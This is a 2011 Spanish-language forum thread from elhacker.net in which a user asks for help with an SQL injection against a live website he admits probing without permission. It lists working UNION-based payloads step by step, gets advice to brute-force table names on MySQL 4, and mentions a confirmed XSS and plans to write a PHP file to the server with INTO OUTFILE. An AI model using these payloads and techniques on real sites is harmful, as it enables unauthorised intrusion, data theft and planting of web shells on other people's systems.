elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ayuda en una inyeccion sql
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda en una inyeccion sql  (Leído 4,557 veces)
xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Ayuda en una inyeccion sql
« en: 25 Junio 2011, 13:12 pm »

Buenas a todos.

El otro dia me dio por hacer una inyeccion a una web sin fines satanicos solo para pobrar si era vulnerable y lo era.. pero me pasan varias cosas y tengo las dudas

1.- Empiezo con order: vuln.php?id=69+order+by+10 no error .... 15 error .... 12 error ..... 11 no error
vale es 11....

2.- vuln.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--
el servidor me tira ... Bad request ?¿?

3.- Añado "all" entre union y select y .... Hola me suelta las columnas vulnerables
vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--

4.- Miro la version de mysql: vuln.php?id=-1+union+all+select+1,@@version,2,3,4,5,6,7,8,9,10,11--   es 4.1.22

5.- Vamos ^^ vuln.php?id=-1+union+all+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables--
y en vez de salirme nada me sale un error otra vez ... dos en concreto

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxx/home/html/vuln.php on line 40

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxxx/home/html/vuln.php on line 105

He estado mirando y creo que puede ser que sea por que es MySql 4 pero bueno
Un saludo a todos y gracias :)
« Última modificación: 25 Junio 2011, 13:28 pm por xustyx » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda en una inyeccion sql
« Respuesta #1 en: 25 Junio 2011, 23:05 pm »

MySQL 4 no tiene information.schema, apartir del 5 la implementaron.
En línea

Te vendería mi talento por poder dormir tranquilo.
xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: Ayuda en una inyeccion sql
« Respuesta #2 en: 26 Junio 2011, 02:02 am »

Sips ya me imaginava que seria algo asi pero entonces las Tablas se sacan de la manga no? hay que ir probando ...
En línea

Cleantesdeasso

Desconectado Desconectado

Mensajes: 185



Ver Perfil
Re: Ayuda en una inyeccion sql
« Respuesta #3 en: 26 Junio 2011, 13:01 pm »

Buenas. Tienes q ir probando a mano, o hacerte un script  con los nombres de las supuestas tablas y asi no te aburres tanto: admin, user, username, login, tbluser, administration... No se si en el foro ya habia algo similar por ahi...
En línea

"Que no!! q el hash hay q crakiarlo!!"
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda en una inyeccion sql
« Respuesta #4 en: 26 Junio 2011, 20:19 pm »

Si lo hay ;)
En línea

Te vendería mi talento por poder dormir tranquilo.
xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: Ayuda en una inyeccion sql
« Respuesta #5 en: 27 Junio 2011, 13:51 pm »

Bueno el SQLi helper lo hace pero no me saca ninguna tabla :S

Y lo raro en la inyección es que si pongo alguna letra, como por ejemplo, +FROM
salen los dos errores .... que pongo @@datadir también.... que pongo hola también... no se por que pasa esto :S en cambio para ver si en hex me dejaba codifique hola en hex y salia hola y también, probé si podia hacer un XSS y codifique un script de alert para ver si lo metía y si que funcionaba, cargaba la pagina se veían los numeros 2,3,4,5.... y salia la ventanita del XSS.

Lo que pasa es por ejemplo si quiero poner el +from en hex no me deja :S o hacer into outfile para crear un archivo php el que sea ya que tengo el path entero del server :S...

Seguiré buscando ... ^^
« Última modificación: 27 Junio 2011, 13:54 pm por xustyx » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ayuda con inyeccion sql
Nivel Web
tormenta 4 4,223 Último mensaje 30 Marzo 2005, 06:45 am
por Colymore
Ayuda con inyeccion SQL!
Nivel Web
ilicitanohack 4 3,677 Último mensaje 28 Noviembre 2007, 01:51 am
por berz3k
Inyeccion sql (mysql) Pasa x alto la inyeccion
Nivel Web
Littl3 3 6,611 Último mensaje 5 Marzo 2009, 22:56 pm
por pedrox@
Ayuda sql inyeccion
Nivel Web
bhisorx 2 2,690 Último mensaje 20 Septiembre 2009, 01:07 am
por WHK
Ayuda inyeccion sql
Nivel Web
mened12 1 2,335 Último mensaje 8 Septiembre 2010, 00:12 am
por OzX
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines